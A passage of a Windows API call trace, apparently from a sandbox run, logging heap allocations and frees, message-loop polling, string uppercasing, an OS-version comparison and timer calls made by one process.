hHeap=0x25c0000) returned 1 [0208.127] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0208.127] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0208.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0208.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0208.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16c8 [0208.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0208.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6d0 [0208.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0208.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0208.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0208.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0208.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0208.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0208.128] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0208.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0208.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0208.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0208.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0208.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0208.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0208.128] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0208.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0208.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0208.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0208.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0208.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0208.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0208.129] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0208.129] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0208.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0208.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0208.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0208.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0208.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0208.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0208.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.129] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0208.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0208.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0208.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0208.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0208.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0208.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.130] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0208.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0208.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0208.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0208.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0208.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0208.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0208.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0208.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0208.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0208.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0208.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.131] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0208.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0208.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0208.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0208.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0208.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0208.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0208.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0208.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0208.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0208.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0208.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0208.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0208.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.132] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0208.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0208.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416270 [0208.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0208.132] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0208.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0208.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0208.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0208.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0208.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0208.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa60 [0208.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0208.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0208.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0208.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0208.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0208.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0208.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0208.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0208.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0208.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0208.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0208.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0208.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0208.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0208.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0208.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0208.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0208.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0208.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0208.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.134] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0208.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0208.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0208.134] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0208.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0208.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa868 [0208.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0208.135] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0208.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0208.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0208.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0208.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0208.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0208.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0208.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0208.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.136] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0208.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0208.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0208.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0208.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0208.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0208.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0208.136] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 1 [0208.136] TranslateMessage (lpMsg=0x8bf050) returned 0 [0208.136] DispatchMessageW (lpMsg=0x8bf050) returned 0x0 [0208.136] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0208.136] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0208.136] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0208.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0208.136] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0208.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0208.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0208.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0208.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0208.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0208.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0208.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0208.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0208.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0208.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0208.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0208.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0208.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0208.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0208.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0208.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0208.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0208.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0208.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0208.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0208.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0208.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0208.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0208.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0208.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0208.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0208.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0208.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0208.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0208.139] RtlAllocateHeap 